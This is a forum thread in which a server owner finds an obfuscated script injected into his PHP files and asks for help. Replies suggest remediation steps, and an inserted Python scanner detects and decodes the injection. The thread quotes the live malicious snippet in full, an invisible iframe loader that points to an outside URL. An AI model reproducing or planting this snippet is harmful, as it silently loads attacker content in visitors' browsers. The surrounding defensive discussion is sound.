Server compromised, now what?
I am getting this script, attached to the end of my PHP scripts all over my server:
Code:
<script>yd='co';mh='m';im='a.';rm='h';my='5';t='m/';qg='v';vp='if';x='me';a='p:/';gv='a';q='/r';xk='.';ei='htt';y='k';cw='9';w='s';u='8';dk='ra';f='ytv';iy='e';l='jus';b='ew';hh='rc';h='t';vu=vp.concat(dk,x);qm=w.concat(hh);ka=ei.concat(a,q,b,gv,l,iy,qg,im,yd,t,y,cw,u,my,f,xk,rm,h,mh);var tq=document.createElement(vu);tq.setAttribute('width','1');tq.setAttribute('height','1');tq.frameBorder=0;tq.setAttribute(qm,ka);document.body.appendChild(tq);</script>
Now what??!!?!! 1) How can I find if the server is compromised? 2) How can I find if it's a script on my server that is automatically adding it? 3) What to do?? JM Here is what I find on the net about that script: http://blog.unmaskparasites.com/2011...ction-k985ytv/
Your spelling skills have been compromised. Sorry, I couldn't resist.
Sounds like you have a virus on your server, not that someone hacked it. Had this happen a few years ago with a shitty host and had the same problem.
Ask your host to run a virus scan or install some virus software. Change all passwords, including root, and disable SSH users (only one, if you use it), and make sure that if you have a way to upload files to one of your sites (i.e. videos) you only allow certain formats and exclude .exe etc. files.
Contact your host.
You should be able to figure that out by yourself. I mean, you are a hardcore programmer, so you should be more qualified than me, for example :) Unless I mistook you for someone else :)
BTW, also check your Windows PC/laptop where you have saved FTP/SSH access passwords for your server; the problem might be there, not on the server.
Happened to me a few years ago.
The hosting company should be able to fix/remedy it.
isprime is always on top of this for us; most companies are :thumbsup
Who does your sys admin? You can hire someone if you have the budget for it.
Quote:
I changed all passwords, disabled most SSH access. I read it is an FTP stolen-password problem, so perhaps changing passwords will fix it. The real problem is, I am the host, and this is my first co-located server. I sense a learning experience coming on...
If you're lucky it's just a script hole rather than a full-blown server compromise. The code keeps reappearing because you're treating the symptom (deleting the code) rather than the problem (how they're creating that code).
Your host should be the first step in asking for help. Ask if any unusual IPs have accessed your account via FTP. They may also be able to check web server logs for suspicious activity. As the article you linked suggests, the problem may be related to your own computer, i.e. something running in the background and sniffing passwords.
The second half of this page will give you a general outline as to how to secure your server - fixing stupid default PHP settings, getting rid of unused scripts, turning off suexec for sure, etc.: https://bettercgi.com/strongbox/pass...adyhacked.html Of course there have been 1,200-page books written on the topic, so that one page isn't comprehensive. You may need to talk to someone who has read the 1,200-page books. If they can't get it, talk to someone who has WRITTEN one of the 1,200-page books.
Quote:
I have updated all software, changed all passwords, no suexec, changed ports for ssh, turned off all default settings for apache / php / phpmyadmin. The server is at 67.21.112.158...please test if you can get in or there is something I should fix asap. Oops, first thing is to change the default welcome page. :-(
Quote:
I'm a good PHP programmer, but a lousy admin.
Quote:
I think I will turn off proftp for a few hours and see if the script appears. This will confirm if it's getting in through that.
FTP? Yikes, don't use FTP. Remove any ftp daemon on the box and use SSH.
It probably isn't FTP. It is probably some out-of-date software on your machine with an SQL injection or overflow that allows them to access your machine. Check all software you use (like WordPress, phpMyAdmin, or others) for more recent updates. Check for files with 777 permissions, which is always a problem, and check things like upload directories for .jpg.php files (which usually pass sanitizers).
there is malware for PCs that will use your stored FTP passwords and upload crap to your servers. Might want to check into that as well.
Are you a filezilla user by chance? This is something they're faced with more and more often.
Quote:
So the root SSH was not compromised, nor were any accounts for friends that I am hosting. Suggesting the problem was that the machine was freely sending out passwords. All accounts changed, new machine has new virus software on it, server "appears" stable as of 10am... The good thing is that it appears my home machine was hacked, not the server itself. Also, I don't have any ability to FTP to any sites that are important. Only SSH on non-standard ports. I will disable remote-root password ability once this blows over. Must log in to another account, then su if I want to get to root - I forget what that feature is called.
Quite often someone will have uploaded a script somehow onto the server that is sitting in an image upload dir or some other directory. They can then call that up every now and then and it just fires off and scans all your dirs and adds that script to the end of files. So changing your passwords etc. is like after the horse has bolted. Try doing something like scanning all your files for some of those data patterns, provided they didn't encrypt their upload.
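A scanner for the kind of pattern that reply describes, added here as an example and not code from anyone in this thread: it walks a web root, flags world-writable files (the 777 permissions mentioned earlier), and statically resolves the fragment/concat chains of the injected script so the created element and its URL can be read without executing any JavaScript. The sample input is constructed in the same obfuscation style as the posted script; example.invalid is a placeholder domain.

```python
import os
import re
import stat

# Fingerprint of the injection in the thread: short quoted fragments in 1-3 letter
# variables, glued with String.concat() and fed to createElement/appendChild.
INJECT_RE = re.compile(
    r"<script>(?:\w{1,3}='[^']*';){5,}.*?\.concat\(.*?appendChild\(.*?</script>", re.S)
ASSIGN_RE = re.compile(r"\b(\w{1,3})='([^']*)'")
CONCAT_RE = re.compile(r"(\w+)=(\w+)\.concat\(([\w,]+)\)")

def decode_injection(script):
    """Statically resolve the fragment/concat chain (no JS is executed) and
    report which element is created and which attributes it is given."""
    vals = dict(ASSIGN_RE.findall(script))
    for dst, first, rest in CONCAT_RE.findall(script):
        vals[dst] = "".join(vals.get(p, "") for p in [first] + rest.split(","))
    created = re.search(r"createElement\((\w+)\)", script)
    attrs = {vals.get(k, k): vals.get(v, v)
             for k, v in re.findall(r"setAttribute\((\w+),(\w+)\)", script)}
    return {"element": vals.get(created.group(1)) if created else None, "attrs": attrs}

def scan_text(text):
    """Decoded injections found in one file's contents (empty list if clean)."""
    return [decode_injection(m.group(0)) for m in INJECT_RE.finditer(text)]

def scan_tree(root, exts=(".php", ".html", ".js")):
    """Walk a web root: report injected blocks and world-writable (777) files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.stat(path).st_mode & stat.S_IWOTH:
                findings.append((path, "world-writable"))
            if name.lower().endswith(exts):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend((path, hit) for hit in scan_text(fh.read()))
    return findings

# Constructed sample in the thread's obfuscation style; example.invalid is a
# placeholder, not the domain the real injection pointed at.
SAMPLE = ("<?php echo 'hello'; ?>"
          "<script>a='if';b='ra';c='me';d='s';e='rc';f='htt';g='p:/';h='/ex';"
          "i='ample.inv';j='alid/';k='x.htm';el=a.concat(b,c);at=d.concat(e);"
          "u=f.concat(g,h,i,j,k);var t=document.createElement(el);"
          "t.setAttribute('width','1');t.setAttribute(at,u);"
          "document.body.appendChild(t);</script>")

if __name__ == "__main__":
    print(scan_text(SAMPLE))
```

Run `scan_tree("/path/to/webroot")` to get a list of (path, finding) tuples; each decoded hit tells you the element and the URL it loads, which is what you then search for across the rest of the tree.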
Quote:
I would also suggest not using FTP anymore. SFTP is so much better. Also would recommend against storing passwords anywhere.
Quote:
This means the server is infected with something. It seems this will be my project for tonight. Must eat dinner now, but will try to find it. Thoughts?
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.